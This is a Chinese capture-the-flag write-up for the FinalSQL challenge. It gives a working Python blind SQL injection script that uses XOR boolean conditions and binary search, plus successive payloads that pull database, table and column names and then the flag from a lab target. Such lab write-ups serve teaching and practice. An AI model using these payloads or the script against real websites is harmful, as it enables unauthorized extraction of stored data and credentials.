[极客大挑战 2019]FinalSQL

一、题目分析

登录框测试，发现各种测试都是一样的反应。随机看了一下，几个紫色数字，点了后有回显。数字输入’后，报错，判断从这里开始注入测试。

1、页面没有数据库报错回显，且union被过滤，无法采用联合查询。

2、页面爆出的错误非数据库原始错误，无法使用报错注入。

3、时间盲注耗费时间，非必要一般不使用。

sql异或注入，经过尝试发现^符号未被过滤，(1^2=3)

• 首先可以根据1^0=1 1^1=0 来判断闭合方式（数字型还是字符型）。因为如果是字符型，不会执行^。

• 简单判断是数字型。

二、解题

import time
import requests
import string

url = "http://2b5f61cb-fce5-4e0f-9adb-82ccb1410e97.node4.buuoj.cn:81/search.php"
flag = ''


def payload(i, j):
    # 数据库名字
    sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # 表名
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
    # 列名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
    # 查询flag
    # sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data,timeout=5)
    time.sleep(0.04)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)

if __name__ == "__main__":
    exp()
    print('输出：', flag)

1、 爆数据库名字 payload：

sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)

 输出： information_schema,mysql,performance_schema,test,geek

选数据库：geek

2、爆表名

 sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)

 输出： F1naI1y,Flaaaaag

经结果测试，flag在 F1naI1y

3、爆列名
sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)

输出： id,username,password

4、查询flag
sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)

 输出： cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{f2408a9f-23a1-4b3b-abc1-27789081743d}